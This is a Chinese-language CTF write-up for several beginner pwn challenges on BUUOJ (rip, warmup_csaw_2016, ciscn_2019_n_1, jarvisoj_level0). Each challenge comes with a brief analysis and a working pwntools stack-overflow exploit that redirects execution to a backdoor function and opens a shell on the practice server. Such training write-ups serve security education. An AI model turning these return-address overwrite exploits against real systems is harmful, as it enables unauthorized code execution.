test_your_nc
直接nc就能getshell
rip
下载二进制文件,发现有/bin/sh
data:image/s3,"s3://crabby-images/94523/945233ea1692442bd2652e1ff5c0f1e5ec03755d" alt=""
找到后门函数
data:image/s3,"s3://crabby-images/580f4/580f4d9be5794577bb5fa581e6593cf511d41a77" alt=""
很明显的栈溢出,覆盖返回地址为后门函数即可
data:image/s3,"s3://crabby-images/85607/85607222b3238e8111e6458b006fd7c0b0290a3a" alt=""
exp
1 2 3 4 5
| from pwn import * sh=remote('node3.buuoj.cn',26443) payload='a'*23+p64(0x401187) sh.send(payload) sh.interactive()
|
warmup_csaw_2016
ida打开发现后门函数,直接打开flag.txt,就不用getshell了
data:image/s3,"s3://crabby-images/6cd6e/6cd6e13718a12872d5c7e17722ad9c26643a8353" alt=""
main函数
data:image/s3,"s3://crabby-images/ebc4d/ebc4dd238a20505aad6bac89928a0b5afec5c224" alt=""
sprint会打印后门函数的地址,gets函数造成栈溢出
exp
1 2 3 4 5 6 7
| from pwn import * sh=remote('node3.buuoj.cn',29685) sh.recvuntil('WOW:') addr=sh.recvuntil('\n')[:-1] payload='a'*72+p64(int(addr,16)) sh.send(payload) sh.interactive()
|
ciscn_2019_n_1
ida
data:image/s3,"s3://crabby-images/9d9b8/9d9b8c40272ef409832e6640a22ee5ac6c40417f" alt=""
gets造成栈溢出
data:image/s3,"s3://crabby-images/64cd7/64cd77bd4895f4e6da77dc70aa5fef2561c8a3ec" alt=""
覆盖返回地址exp
1 2 3 4 5
| from pwn import * sh=remote('node3.buuoj.cn',27073) payload='a'*56+p64(0x4006BE) sh.send(payload) sh.interactive()
|
覆盖浮点数exp
1 2 3 4 5
| from pwn import * io = remote("node3.buuoj.cn" , 25077) payload = b'A'*(0x30-0x4) + p64(0x41348000) #浮点数转16进制工具 io.sendline(payload) io.interactive()
|
jarvisoj_level0
ida
data:image/s3,"s3://crabby-images/c7966/c7966f7ef6f457f80a8cecbdc4c5c4ad43c42ac2" alt=""
data:image/s3,"s3://crabby-images/7aad7/7aad7a4af8675b94167d30a4da736eb7c84aa061" alt=""
buf长度128,读入0x200可溢出
exp
1 2 3 4 5
| from pwn import * sh=remote('node3.buuoj.cn',26339) payload='a'*136+p64(0x400596) sh.send(payload) sh.interactive()
|